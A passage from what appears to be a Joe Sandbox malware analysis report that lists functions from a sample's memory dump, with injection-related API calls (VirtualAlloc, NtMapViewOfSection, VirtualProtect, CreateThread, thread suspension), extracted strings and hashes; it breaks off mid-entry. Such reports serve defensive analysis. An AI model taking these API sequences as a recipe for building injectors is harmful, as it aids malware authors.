VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 008BFD39
NtMapViewOfSection.NTDLL(?,00000000,?,?,?,?,?,?), ref: 008BFDEE
VirtualProtect.KERNEL32(?,?,00000008,?,?,?,?,?,?,?), ref: 008BFE0B
VirtualProtect.KERNEL32(?,?,?,00000000), ref: 008BFEAE
VirtualProtect.KERNEL32(?,?,00000002,?,?,?,?,?,?,?), ref: 008BFEE1
CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 008C0052

Memory Dump Source

Source File: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_RIMz2N1u5y.jbxd

Yara matches

Similarity

API ID: Virtual$ProtectSection$CreateView$AllocThread
String ID:
API String ID: 1248616170-0
Opcode ID: 34e3949558d47ac2efbd442dc042839410f73323f736e1ca0bff09bbd7760ed0
Instruction ID: a09e3bd468b8f05222e6675013667d88b62eb851ecc3ed4a9b03dbdca9d737cc
Opcode Fuzzy Hash: 34e3949558d47ac2efbd442dc042839410f73323f736e1ca0bff09bbd7760ed0
Instruction Fuzzy Hash: 74424571604341AFDB24CF28C844BAABBE9FF88754F14492DFA85DB252D770E944CB52

Function 00870EDF Relevance: 6.1, APIs: 4, Instructions: 100
threadprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,00870A25,?,00000001,?,81EC8B55,000000FF), ref: 00870F1D
Thread32First.KERNEL32(00000000,0000001C), ref: 00870F49
Wow64SuspendThread.KERNEL32(00000000), ref: 00870F9C
CloseHandle.KERNEL32(00000000), ref: 00870FC6

Memory Dump Source

Source File: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_RIMz2N1u5y.jbxd

Yara matches

Similarity

API ID: CloseCreateFirstHandleSnapshotSuspendThreadThread32Toolhelp32Wow64
String ID:
API String ID: 1849706056-0
Opcode ID: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
Instruction ID: d98b2dc5cfea5806606e7b1e10863f17012b50a67d99bd4bd01d04a47aac29e9
Opcode Fuzzy Hash: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
Instruction Fuzzy Hash: 0141EB71A00108EFDB18DE58C491BADB7B6EF88300F50C168E619DB7D4DA74EE45CB94

Function 008707CF Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 399
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000001,?,81EC8B55,000000FF), ref: 00870A72

Strings

W_op, xrefs: 008708B3

Memory Dump Source

Source File: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_RIMz2N1u5y.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID: W_op
API String ID: 2422867632-2719909854
Opcode ID: be4fea6fcd322fd33ed4d296f782dd095430a483cef6c8bc1d7347062a827966
Instruction ID: 8dabf9d477e6958b98cfd43b58c5a25bbcfe03028aef062c01af331e4643a586
Opcode Fuzzy Hash: be4fea6fcd322fd33ed4d296f782dd095430a483cef6c8bc1d7347062a827966
Instruction Fuzzy Hash: 0A12B3B1E00219DFDB14DF98C990BADBBB2FF48304F2482A9D519AB385D774AA41CF54

Function 00870D8F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00870E5B

Strings

,, xrefs: 00870EA7

Memory Dump Source

Source File: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_RIMz2N1u5y.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID: ,
API String ID: 2422867632-3772416878
Opcode ID: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
Instruction ID: 0e7cddf6745a0c0de2b7c990ce4154a00d9ab8f24cb1b5591f19f956a90a5df4
Opcode Fuzzy Hash: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
Instruction Fuzzy Hash: D541B675A00209EFDB14CF98C994BAEB7B1FF88314F208598D515AB394C771AE81DF94

Function 008BE2E4 Relevance: 6.1, APIs: 4, Instructions: 99
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008C0502: LoadLibraryA.KERNEL32(00000000,?,?), ref: 008C0594

VirtualProtect.KERNEL32(00000000,0000000C,00000040,?), ref: 008BE33F
VirtualProtect.KERNEL32(00000000,0000000C,?,?), ref: 008BE372
VirtualProtect.KERNEL32(00000000,0040145E,00000040,?), ref: 008BE3A5
VirtualProtect.KERNEL32(00000000,0040145E,?,?), ref: 008BE3CF

Memory Dump Source

Source File: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_RIMz2N1u5y.jbxd

Yara matches

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: 544c524c5f03252b96133d4295c441da5d44db607709df4b952f0ae727dfced4
Instruction ID: 76ad9344e740444e0450b4c2f8b736fdd22dec02246ca0e3ee092e33c7e0f5b6
Opcode Fuzzy Hash: 544c524c5f03252b96133d4295c441da5d44db607709df4b952f0ae727dfced4
Instruction Fuzzy Hash: D521C9721043097FE320A9649C45FFB76ECEB85344F04443EFB96D2652E7B5E9048671

Function 008BF154 Relevance: 4.8, APIs: 3, Instructions: 325
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 008BF1CE
VirtualFree.KERNELBASE(00000000,00000000,0000C000), ref: 008BF512
RtlExitUserProcess.NTDLL(00000000), ref: 008BF51B

Memory Dump Source

Source File: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_RIMz2N1u5y.jbxd

Yara matches

Similarity

API ID: Virtual$AllocExitFreeProcessUser
String ID:
API String ID: 1828502597-0
Opcode ID: 3017fd99d0584aa20b0153e116f0a50b272e6a421316d4372083565c5f77b8b3
Instruction ID: 6e3fb18f6eaa7bb5c30c95319f1558d95e93421d6c5b472be0153b24c978e531
Opcode Fuzzy Hash: 3017fd99d0584aa20b0153e116f0a50b272e6a421316d4372083565c5f77b8b3
Instruction Fuzzy Hash: 7CB1BE31500706EBDB219E64CC80FEBB7A8FF49310F140939F699D6252E731E950DBA6

Function 008C0502 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(00000000,?,?), ref: 008C0594

Strings

.dll, xrefs: 008C0539

Memory Dump Source

Source File: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_RIMz2N1u5y.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: .dll
API String ID: 1029625771-2738580789
Opcode ID: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
Instruction ID: e6f103655b2867748a6e84501746d614cd5f4ca557de6bf185c34e602aa7454c
Opcode Fuzzy Hash: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
Instruction Fuzzy Hash: 22219075604289DFDB21CEA8D844F6A7BB4FF053A4F18416DD815EBA41D770EC458F90

Function 008BE3DF Relevance: 3.0, APIs: 2, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008C0502: LoadLibraryA.KERNEL32(00000000,?,?), ref: 008C0594

VirtualProtect.KERNEL32(00000000,00000004,00000040,?), ref: 008BE417
VirtualProtect.KERNEL32(00000000,00000004,?,?), ref: 008BE43A

Memory Dump Source

Source File: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_RIMz2N1u5y.jbxd

Yara matches

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: 355f7a5a870867b02340d2dab44903ecb3bac44aab23468b058fab7a7d97728b
Instruction ID: 65967daa0d99e5c67ea5d158b425ea66e2b08841152821fecc2fd879c0e68691
Opcode Fuzzy Hash: 355f7a5a870867b02340d2dab44903ecb3bac44aab23468b058fab7a7d97728b
Instruction Fuzzy Hash: 0BF0A4B6210604BFE6109664CC42FFB33BCEF45754F440418FB06D6181EB75EA018BBA

Non-executed Functions

Function 008A546D Relevance: 80.4, Strings: 64, Instructions: 372
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

f, xrefs: 008A5720
/, xrefs: 008A5663
[, xrefs: 008A5823
^, xrefs: 008A5907
LKJI, xrefs: 008A5A74
n, xrefs: 008A592F
t, xrefs: 008A5782
$, xrefs: 008A568D
7, xrefs: 008A5639
H, xrefs: 008A579E
x, xrefs: 008A5487
l, xrefs: 008A56DA
p, xrefs: 008A5766
b, xrefs: 008A54B1
R, xrefs: 008A54A3
C, xrefs: 008A590F
D, xrefs: 008A57F2
@, xrefs: 008A57D6
X, xrefs: 008A580E
b, xrefs: 008A5704
Z, xrefs: 008A581C
A, xrefs: 008A553D
B, xrefs: 008A5601
J, xrefs: 008A57AC
y, xrefs: 008A561D
], xrefs: 008A5591
I, xrefs: 008A5927
N, xrefs: 008A57C8
h, xrefs: 008A56BE
L, xrefs: 008A591F
4, xrefs: 008A59E5
3, xrefs: 008A56B7
), xrefs: 008A56A9
@, xrefs: 008A562B
Y, xrefs: 008A5575
j, xrefs: 008A56CC
1, xrefs: 008A54CD
), xrefs: 008A5655
d, xrefs: 008A5712
9, xrefs: 008A5A07
*, xrefs: 008A569B
n, xrefs: 008A56E8
j, xrefs: 008A54BF
}, xrefs: 008A5671
~, xrefs: 008A5758
x, xrefs: 008A572E
L, xrefs: 008A57BA
;, xrefs: 008A55E5
F, xrefs: 008A5800
\, xrefs: 008A582A
d, xrefs: 008A54DB
v, xrefs: 008A5790
9, xrefs: 008A5495
r, xrefs: 008A5774
K, xrefs: 008A5513
t, xrefs: 008A54E9
i, xrefs: 008A54F7
|, xrefs: 008A574A
z, xrefs: 008A573C
., xrefs: 008A55F3
=, xrefs: 008A567F
`, xrefs: 008A56F6
B, xrefs: 008A57E4
M, xrefs: 008A5917

Memory Dump Source

Source File: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_RIMz2N1u5y.jbxd

Yara matches

Similarity

API ID:
String ID: $$)$)$*$.$/$1$3$4$7$9$9$;$=$@$@$A$B$B$C$D$F$H$I$J$K$L$L$LKJI$M$N$R$X$Y$Z$[$\$]$^$`$b$b$d$d$f$h$i$j$j$l$n$n$p$r$t$t$v$x$x$y$z$|$}$~
API String ID: 0-2684223533
Opcode ID: 8e8bf7b6e4afc31ae7a8d892defdd8308e3a6390efeb5b60dc72ccb8a9722708
Instruction ID: 8889caaa3499cc37e79923771999013f23bbaea960999acae294ebc55166cf71
Opcode Fuzzy Hash: 8e8bf7b6e4afc31ae7a8d892defdd8308e3a6390efeb5b60dc72ccb8a9722708
Instruction Fuzzy Hash: 452230219087E98DDB32C63C8C087DDBE715B67324F0843D9D1E86B2D2D7B50A86CB66

Function 00894CFC Relevance: 29.2, Strings: 23, Instructions: 455
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

_A, xrefs: 00894F7D
b3e5, xrefs: 008950EF
s=K?, xrefs: 0089544B
t+v, xrefs: 008951EA
f7l9, xrefs: 008950F9
0mWo, xrefs: 008954C3
?Q4S, xrefs: 0089547D
)*, xrefs: 0089578A
x;n=, xrefs: 00895103
T!~#, xrefs: 00895405
>y<{, xrefs: 008954E1
=U:W, xrefs: 00895487
4A.C, xrefs: 00895455
Au5w, xrefs: 008954D7
CqEs, xrefs: 008954CD
*+, xrefs: 0089512B
N)C+, xrefs: 00895419
t#s%, xrefs: 00895117
MO, xrefs: 00895077
k%@', xrefs: 0089540F
+E)G, xrefs: 0089545F
=Y)[, xrefs: 00895491
O-K/, xrefs: 00895423

Memory Dump Source

Source File: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_RIMz2N1u5y.jbxd

Yara matches

Similarity

API ID:
String ID: t+v$)*$*+$+E)G$0mWo$4A.C$=U:W$=Y)[$>y<{$?Q4S$Au5w$CqEs$MO$N)C+$O-K/$T!~#$b3e5$f7l9$k%@'$s=K?$t#s%$x;n=$_A
API String ID: 0-2213112349
Opcode ID: 0259f717ecf1a5fbf392b0d04b0a5f6626a938fd807ae921046bb65c5b61ea4b
Instruction ID: bf3fd1ff09d04439dc1bf84ee33e4f70bd305cb9b56f655dc6d5c3b7ca233d29
Opcode Fuzzy Hash: 0259f717ecf1a5fbf392b0d04b0a5f6626a938fd807ae921046bb65c5b61ea4b
Instruction Fuzzy Hash: 2D421CB5D0926D8ADBA5DF16994039DBAB1FB40700F25D2E8C49D7B248CB795A82CFC0

Function 008A72BC Relevance: 15.3, Strings: 12, Instructions: 262COMMON

Download Yara Rule

Strings

L, xrefs: 008A744A
K, xrefs: 008A7355
K, xrefs: 008A744F
I, xrefs: 008A7571
J, xrefs: 008A735A
I, xrefs: 008A735F
K, xrefs: 008A7567
J, xrefs: 008A7454
J, xrefs: 008A756C
I, xrefs: 008A7459
L, xrefs: 008A7562
L, xrefs: 008A7350

Memory Dump Source

Source File: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_RIMz2N1u5y.jbxd

Yara matches

Similarity

API ID:
String ID: I$I$I$J$J$J$K$K$K$L$L$L
API String ID: 0-2736399220
Opcode ID: d49b88ee4eee389bd5fc382c15596c884e7bd027ae630d988f0cf46665355d18
Instruction ID: b7b8a1422e32955aa4cf0765bf2bf181495c82f1735e0c30ee47274c1eb54f37
Opcode Fuzzy Hash: d49b88ee4eee389bd5fc382c15596c884e7bd027ae630d988f0cf46665355d18
Instruction Fuzzy Hash: 18A14A7250C7848BE3048A28CC5032EBFD2EBDB318F198A2DE5D6C7792D678C945974B

Function 008A6D5C Relevance: 12.7, Strings: 10, Instructions: 215COMMON

Download Yara Rule

Strings

}, xrefs: 008A6D6F
~, xrefs: 008A6DE9
|, xrefs: 008A6D6A
c2.), xrefs: 008A6DFF
c2.), xrefs: 008A6E06
|, xrefs: 008A6DDF
c2.), xrefs: 008A6D8A
c2.), xrefs: 008A6D91
}, xrefs: 008A6DE4
~, xrefs: 008A6D74

Memory Dump Source

Source File: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_RIMz2N1u5y.jbxd

Yara matches

Similarity

API ID:
String ID: c2.)$c2.)$c2.)$c2.)$|$|$}$}$~$~
API String ID: 0-1144048153
Opcode ID: d485fb3b6af506a1c47aef30a555c2cf9392bf1476e19ad3fe4f9f4cf07560ac
Instruction ID: fd24944479c72ef21f700d97c6c905e320a35e70e4eae4b704e937bbc6436de3
Opcode Fuzzy Hash: d485fb3b6af506a1c47aef30a555c2cf9392bf1476e19ad3fe4f9f4cf07560ac
Instruction Fuzzy Hash: 7771E31260D7C14EE315863C895426FAED25BE7238F2CCAADE0E6C77DAE925C5058363

Function 008A6039 Relevance: 12.7, Strings: 10, Instructions: 187COMMON

Download Yara Rule

Strings

8, xrefs: 008A6075
0, xrefs: 008A6170
B, xrefs: 008A6065
&, xrefs: 008A6051
LKJI, xrefs: 008A61EB
$, xrefs: 008A6049
`, xrefs: 008A618A
a, xrefs: 008A618E
G, xrefs: 008A605D
C, xrefs: 008A606D

Memory Dump Source

Source File: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_RIMz2N1u5y.jbxd

Yara matches

Similarity

API ID:
String ID: $$&$0$8$B$C$G$LKJI$`$a
API String ID: 0-1761522954
Opcode ID: 0ce8fa78f478918c8e8b6b1a00e2881cd8c0190354c2b6b48c38b0668c5ed414
Instruction ID: cef2cc9b871e3840208ca10db53880ea8573f904026705e4127fb525fd719867
Opcode Fuzzy Hash: 0ce8fa78f478918c8e8b6b1a00e2881cd8c0190354c2b6b48c38b0668c5ed414
Instruction Fuzzy Hash: EF811432D083D88FDB12CB78C8443DDBFB2AB56314F0C86A9C495AB3DADA744A45CB55

Function 0087ACEC Relevance: 11.7, Strings: 9, Instructions: 450COMMON

Download Yara Rule

Strings

jUUX, xrefs: 0087AD61
=WQQ, xrefs: 0087AD47
sumk, xrefs: 0087B0A7
M[XD, xrefs: 0087AD27
WN, xrefs: 0087AD4F
@[AD, xrefs: 0087AD2F
WLR+, xrefs: 0087AD3F
b, xrefs: 0087B043
jUUX, xrefs: 0087B13C

Memory Dump Source

Source File: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_RIMz2N1u5y.jbxd

Yara matches

Similarity

API ID:
String ID: =WQQ$@[AD$M[XD$WLR+$WN$b$jUUX$jUUX$sumk
API String ID: 0-1302826949
Opcode ID: d4b07d2b4aedff03e6feb5c3e5c9871842d32888d13d809aebe9e9dc19282036
Instruction ID: dcd5568f3980d0c120f4c5c8ac599f21c2f0bba14fc77687766ed40d220aca1f
Opcode Fuzzy Hash: d4b07d2b4aedff03e6feb5c3e5c9871842d32888d13d809aebe9e9dc19282036
Instruction Fuzzy Hash: 6FD1167154C3918BC326CF79885036BFFE1AF97214F0889ADE4E98B342D635C909C7A6

Function 00890EC8 Relevance: 10.9, Strings: 8, Instructions: 927COMMON

Download Yara Rule

Strings

%J8L, xrefs: 00891545
8^9P, xrefs: 00891577
)V#h, xrefs: 0089158B
3B"D, xrefs: 00891559
9N0@, xrefs: 0089154F
0R&T, xrefs: 00891581
5Z?\, xrefs: 0089156D
"F"X, xrefs: 00891563

Memory Dump Source

Source File: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_RIMz2N1u5y.jbxd

Yara matches

Similarity

API ID:
String ID: "F"X$%J8L$)V#h$0R&T$3B"D$5Z?\$8^9P$9N0@
API String ID: 0-4188904333
Opcode ID: c435fb983e23c354d5be12c14e6e57d1b71bcdcf551c90d91318eede61e7c560
Instruction ID: 502f50770ab84b1d0ef1f0e30024fbad30d59ac54a7fdc566a5e08bbb70fecad
Opcode Fuzzy Hash: c435fb983e23c354d5be12c14e6e57d1b71bcdcf551c90d91318eede61e7c560
Instruction Fuzzy Hash: 9F5235B1A042168BCF24DF69CC923AAB7B2FF95310F18926CD456EF394E7389941CB54

Function 008A763C Relevance: 9.4, Strings: 7, Instructions: 656COMMON

Download Yara Rule

Strings

R3^5, xrefs: 008A79A3
`abc, xrefs: 008A7D82
DMNO, xrefs: 008A7694, 008A773D
x%, xrefs: 008A77CF
7(, xrefs: 008A7ADC
s?@!, xrefs: 008A79BB
V7~9, xrefs: 008A79AB

Memory Dump Source

Source File: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_RIMz2N1u5y.jbxd

Yara matches

Similarity

API ID:
String ID: 7($DMNO$R3^5$V7~9$`abc$s?@!$x%
API String ID: 0-1090096584
Opcode ID: 1c3545fa3af9ddeb3b6c27615fd33202978d48eb55675b2c0e3ea3675345ca31
Instruction ID: d8188e01845d622b3a152a6f8e57b706e71c307952fa0e4932efda685752805a
Opcode Fuzzy Hash: 1c3545fa3af9ddeb3b6c27615fd33202978d48eb55675b2c0e3ea3675345ca31
Instruction Fuzzy Hash: D622F0726483019FE314CF29CC84B6BBBE6EFC6314F18892CE595CB291D674D806CB56

Function 0088B26C Relevance: 9.0, Strings: 6, Instructions: 1469COMMON

Download Yara Rule

Strings

LKJI, xrefs: 0088B7EC
LKJI, xrefs: 0088C171
JK, xrefs: 0088B688
*G$I, xrefs: 0088B680
LKJI, xrefs: 0088B29C
lC E, xrefs: 0088B678

Memory Dump Source

Source File: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_RIMz2N1u5y.jbxd

Yara matches

Similarity

API ID:
String ID: *G$I$JK$LKJI$LKJI$LKJI$lC E
API String ID: 0-1846479541
Opcode ID: 05c5505df2c127189b4220558efd9c6a6b5e11093dc94cf73b5a68ce34b04f3e
Instruction ID: 64fe82e1ac05a7b8e6d9c793c8e5594f4c06385c1f89a139b13ced13971a23f4
Opcode Fuzzy Hash: 05c5505df2c127189b4220558efd9c6a6b5e11093dc94cf73b5a68ce34b04f3e
Instruction Fuzzy Hash: FFA235366093119FE724DF24C880A6AB7E2FBD6300F19C96CE585CB256DB71EC06CB52

Function 0088F58C Relevance: 8.4, Strings: 6, Instructions: 870COMMON

Download Yara Rule

Strings

..70, xrefs: 0088F958
N, xrefs: 0088FC38
705, xrefs: 0088FCA8
EC, xrefs: 0088F8A4
F, xrefs: 0088F7AA
;6=2, xrefs: 0088F942

Memory Dump Source

Source File: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_RIMz2N1u5y.jbxd

Yara matches

Similarity

API ID:
String ID: 705$..70$;6=2$EC$F$N
API String ID: 0-1390691857
Opcode ID: f50e1a731abf381cd6f151d4726570c6a1e31f27433472180e76934dac9b8db9
Instruction ID: c2f34dcffa69f181a14e2b1957df441d826e4267be1c30cc9609995d8819f7ca
Opcode Fuzzy Hash: f50e1a731abf381cd6f151d4726570c6a1e31f27433472180e76934dac9b8db9
Instruction Fuzzy Hash: ED52257550C3908BD725DF28C84066ABBE2FF96314F18867CE9D9CB392D7358906CB92

Function 00882F7A Relevance: 8.0, Strings: 6, Instructions: 522COMMON

Download Yara Rule

Strings

[, xrefs: 00882F91
d, xrefs: 00883482
<, xrefs: 00883542
", xrefs: 008831AE
}, xrefs: 008832FE
_, xrefs: 00883004

Memory Dump Source

Source File: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_RIMz2N1u5y.jbxd

Yara matches

Similarity

API ID:
String ID: "$<$[$_$d$}
API String ID: 0-4270223103
Opcode ID: 16aa819c96d65378c585e553c388c74e6d584524459cc83fe5cb2430be56a973
Instruction ID: 03812370b7d6307e63281cd9bf37b7046c0c81c4142794caf589efc12d46b628
Opcode Fuzzy Hash: 16aa819c96d65378c585e553c388c74e6d584524459cc83fe5cb2430be56a973
Instruction Fuzzy Hash: 29227E7160C7808BD724EB3884913AEBBE1FBD5724F198A2DE4D9C7392DA348945DB43

Function 0087AA8C Relevance: 7.8, Strings: 6, Instructions: 254COMMON

Download Yara Rule

Strings

Vi, xrefs: 0087AB6D
~L@E, xrefs: 0087AB45
ptzu, xrefs: 0087AB3D
{=%{, xrefs: 0087AB35
uxHp, xrefs: 0087AB2D
wuAw, xrefs: 0087AB5D

Memory Dump Source

Source File: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_RIMz2N1u5y.jbxd

Yara matches

Similarity

API ID:
String ID: Vi$ptzu$uxHp$wuAw${=%{$~L@E
API String ID: 0-2292347137
Opcode ID: 7b9ef7e4b19e3d76aa3d509f3eaa83661429921d4e30dd0df4b1a76a15b12fb9
Instruction ID: b0ce0cf0141f8651c87636202d7845e6a74a33195ef443b294b7575443b7b8f8
Opcode Fuzzy Hash: 7b9ef7e4b19e3d76aa3d509f3eaa83661429921d4e30dd0df4b1a76a15b12fb9
Instruction Fuzzy Hash: 2261D12024D3D29BD3168F3A84A076FFFE0EFE3250F08896DE4D48B246D32589099757

Function 0087B1CC Relevance: 6.6, Strings: 5, Instructions: 359COMMON

Download Yara Rule

Strings

E, xrefs: 0087B3FC
O, xrefs: 0087B362
Kt, xrefs: 0087B480
Gz, xrefs: 0087B488
!, xrefs: 0087B59F

Memory Dump Source

Source File: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_RIMz2N1u5y.jbxd

Yara matches

Similarity

API ID:
String ID: !$E$Gz$Kt$O
API String ID: 0-1750267231
Opcode ID: 1ea70ce4ccbd52f5ebfed9b53be9e8cf8e831dd5474308b0635f676ed1f72ed0
Instruction ID: f1ab59c51ad176fe62c43dc522dea87557ac473230c29685246a90a2a1821c27
Opcode Fuzzy Hash: 1ea70ce4ccbd52f5ebfed9b53be9e8cf8e831dd5474308b0635f676ed1f72ed0
Instruction Fuzzy Hash: 96B1EFB16083408BD318DF259891BAFBBE6EFD2314F14896CE4D5CB296D738C40ACB56

Function 0088DC86 Relevance: 6.5, Strings: 5, Instructions: 207COMMON

Download Yara Rule

Strings

~rB!, xrefs: 0088DD45
j/1Q, xrefs: 0088DDEC
n#K%, xrefs: 0088DE1E
VW, xrefs: 0088DDFC
KM, xrefs: 0088DE58

Memory Dump Source

Source File: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_RIMz2N1u5y.jbxd

Yara matches

Similarity

API ID:
String ID: VW$j/1Q$n#K%$~rB!$KM
API String ID: 0-1003587301
Opcode ID: e53c140b061fc095275afa7af1258950167901b86aed297f9d2011ad7e6a85d1
Instruction ID: 20a30b8f0d13e9cd7cd6b2e4757af61635e6e5797528d46f962641b0c9eb0620
Opcode Fuzzy Hash: e53c140b061fc095275afa7af1258950167901b86aed297f9d2011ad7e6a85d1
Instruction Fuzzy Hash: 7C71CBB254C3409FD705AF6A885199FBFE2EFD2304F14982CF0C48B355DA39CA099B96

Function 0087FF1D Relevance: 6.4, Strings: 5, Instructions: 184COMMON

Download Yara Rule

Strings

rg, xrefs: 0087FF8F
X, xrefs: 008800C7
%V, xrefs: 008800BC
!%, xrefs: 0087FF1F
B, xrefs: 0087FF29

Memory Dump Source

Source File: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_RIMz2N1u5y.jbxd

Yara matches

Similarity

API ID:
String ID: !%$%V$B$X$rg
API String ID: 0-1800674655
Opcode ID: 19b84d581932cf2d385a8253674ae8e1829070b119135886f65f8cf0552ef655
Instruction ID: f62c038dc92a2800e2d5c5f081ce4110784051f2d612725cbbb3cb7fa51e7ebe
Opcode Fuzzy Hash: 19b84d581932cf2d385a8253674ae8e1829070b119135886f65f8cf0552ef655
Instruction Fuzzy Hash: 6C5118716183414BD7289B388C527EFBBE2EBDA314F189A3CD0C9C7292D7388416875A

Function 0089CD70 Relevance: 6.0, Strings: 4, Instructions: 976COMMON

Download Yara Rule

Strings

J, xrefs: 0089D538
{fby, xrefs: 0089D45C
[, xrefs: 0089D84A
>XV{, xrefs: 0089D0AE

Memory Dump Source

Source File: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_RIMz2N1u5y.jbxd

Yara matches

Similarity

API ID:
String ID: >XV{$J$[${fby
API String ID: 0-3606238112
Opcode ID: 7d31cc63ff5770695c31b1e43ba50890859d631cefc6034410afff56c316ae69
Instruction ID: 287ae790828335fcba6c195865da0f097a9626db9a73d227c9493bc3dc33af11
Opcode Fuzzy Hash: 7d31cc63ff5770695c31b1e43ba50890859d631cefc6034410afff56c316ae69
Instruction Fuzzy Hash: C652E62160C3D18EDB259B2984507ABBBD2EFD7344F1D89ADD4C99B382C739480AC767

Function 0087F827 Relevance: 5.3, Strings: 4, Instructions: 312COMMON

Download Yara Rule

Strings

